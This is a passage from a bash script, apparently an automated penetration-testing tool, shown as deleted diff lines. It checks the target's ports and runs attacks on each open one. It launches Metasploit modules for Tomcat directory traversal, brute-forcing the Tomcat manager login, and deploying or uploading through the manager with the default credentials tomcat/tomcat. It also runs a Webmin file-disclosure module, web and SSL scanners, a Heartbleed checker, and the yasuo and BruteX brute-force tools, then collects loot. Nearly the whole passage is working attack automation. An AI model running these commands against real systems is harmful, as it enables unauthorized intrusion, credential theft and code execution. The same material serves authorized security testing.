RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" -fi - -if [ -z "$port_8443" ] -then - echo -e "$OKRED+ -- --=[Port 8443 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 8443 opened... running tests...$RESET" - wafw00f http://$TARGET:8443 - echo "" - whatweb http://$TARGET:8443 - echo "" - xsstracer $TARGET 8443 - sslscan --no-failed $TARGET:8443 - cd MassBleed - ./massbleed $TARGET port 8443 - cd .. - nikto -h https://$TARGET:8443 - nmap -p 8443 --script=*proxy* $TARGET - arachni https://$TARGET:8443 --output-only-positives --scope-include-subdomains -fi - -if [ -z "$port_10000" ] -then - echo -e "$OKRED+ -- --=[Port 10000 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 10000 opened... running tests...$RESET" - msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" -fi - -if [ -z "$port_49152" ] -then - echo -e "$OKRED+ -- --=[Port 49152 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 49152 opened... running tests...$RESET" - $SUPER_MICRO_SCAN $TARGET -fi - -echo -e "$OKGREEN################################### Running Brute Force #############################$RESET" -cd yasuo -ruby yasuo.rb -r $TARGET -b all -cd ../BruteX -./brutex $TARGET -rm -f hydra.restore -mv loot/* ../loot/ -cd .. -echo "" -rm -f scan.log -echo -e "$OKGREEN################################### Done! ###########################################$RESET" -exit 0